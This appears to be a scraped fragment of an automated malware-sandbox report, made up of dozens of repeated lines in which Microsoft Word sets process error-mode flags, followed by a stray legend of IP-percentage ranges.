Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs